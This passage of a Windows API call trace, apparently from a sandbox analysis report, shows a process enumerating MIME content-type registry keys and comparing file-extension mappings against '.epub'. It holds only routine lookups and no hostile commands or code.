lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/x-component", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb3, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/x-ms-contact", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb4, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/x-ms-iqy", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb5, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/x-ms-odc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb6, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/x-ms-rqy", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb7, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/x-scriptlet", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb8, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/x-vcard", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb9, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xba, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/3gpp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xbb, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/3gpp2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xbc, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/avi", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xbd, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/mp4", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xbe, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/mpeg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xbf, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/mpg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc0, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/msvideo", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc1, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/quicktime", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc2, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/vnd.dece.mp4", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc3, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/vnd.dlna.mpeg-tts", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc4, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/wtv", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc5, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-m4v", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc6, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-matroska", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc7, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-matroska-3d", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc8, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-mpeg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc9, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-mpeg2a", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xca, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-ms-asf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xcb, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-ms-asf-plugin", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xcc, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-ms-dvr", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.306] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xcd, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-ms-wm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xce, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-ms-wmv", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xcf, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-ms-wmx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd0, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-ms-wvx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd1, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="video/x-msvideo", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd2, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vnd.ms-pki.certstore", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd3, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vnd.ms-pki.pko", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd4, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vnd.ms-pki.seccat", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd5, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="x-pkcs12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd6, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="x-pkcs7-certificates", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd7, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="x-pkcs7-certreqresp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd8, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="x-x509-ca-cert", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.307] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.307] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/atom+xml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml=animation/narrative", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac=audio/vnd.dlna.adts", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif=audio/aiff", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aifc=audio/aiff", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aiff=audio/aiff", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".au=audio/basic", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm=audio/x-gsm", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar=audio/midi", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u=audio/x-mpegurl", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a=audio/mp4", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid=audio/mid", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".midi=audio/mid", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpega=audio/x-mpg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2=audio/mpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3=audio/mpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpga=audio/x-mpg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u=audio/x-mpegurl", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls=audio/x-scpls", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp=audio/vnd.qcelp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ra=audio/x-realaudio", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram=audio/x-pn-realaudio", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rm=audio/x-pn-realaudio", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2=audio/x-sd2", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid=audio/prs.sid", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd=audio/basic", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav=audio/wav", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wax=audio/x-ms-wax", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wma=audio/x-ms-wma", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".art=image/x-jg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp=image/bmp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdr=image/x-coreldraw", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdt=image/x-coreldrawtemplate", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpt=image/x-corelphotopaint", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".djv=image/vnd.djvu", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".djvu=image/vnd.djvu", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif=image/gif", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ief=image/ief", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico=image/x-icon", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jng=image/x-jng", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg=image/jpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpeg=image/jpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpe=image/jpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pat=image/x-coreldrawpattern", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pcx=image/pcx", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pbm=image/x-portable-bitmap", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pgm=image/x-portable-graymap", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pict=image/x-pict", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png=image/png", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pnm=image/x-portable-anymap", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pntg=image/x-macpaint", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppm=image/x-portable-pixmap", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".psd=image/x-psd", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qtif=image/x-quicktime", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ras=image/x-cmu-raster", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rf=image/vnd.rn-realflash", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rgb=image/x-rgb", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rp=image/vnd.rn-realpix", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sgi=image/x-sgi", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".svg=image/svg+xml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".svgz=image/svg+xml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".targa=image/x-targa", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".tif=image/tiff", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wbmp=image/vnd.wap.wbmp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".webp=image/webp", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xbm=image/xbm", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xbm=image/x-xbitmap", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xpm=image/x-xpixmap", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xwd=image/x-xwindowdump", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".323=text/h323", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xml=text/xml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".uls=text/iuls", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".txt=text/plain", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtx=text/richtext", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wsc=text/scriptlet", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rt=text/vnd.rn-realtext", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".htt=text/webviewhtml", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".htc=text/x-component", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".vcf=text/x-vcard", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asf=video/x-ms-asf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".asx=video/x-ms-asf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi=video/avi", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dl=video/dl", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dv=video/dv", cchCount1=5, lpString2=".epub", cchCount2=5) returned 1 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flc=video/flc", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fli=video/fli", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gl=video/gl", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lsf=video/x-la-asf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lsx=video/x-la-asf", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mng=video/x-mng", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2=video/mpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3=video/mpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4=video/mp4", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpeg=video/mpeg", cchCount1=5, lpString2=".epub", cchCount2=5) returned 3 [0104.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpa=audio/mpeg", 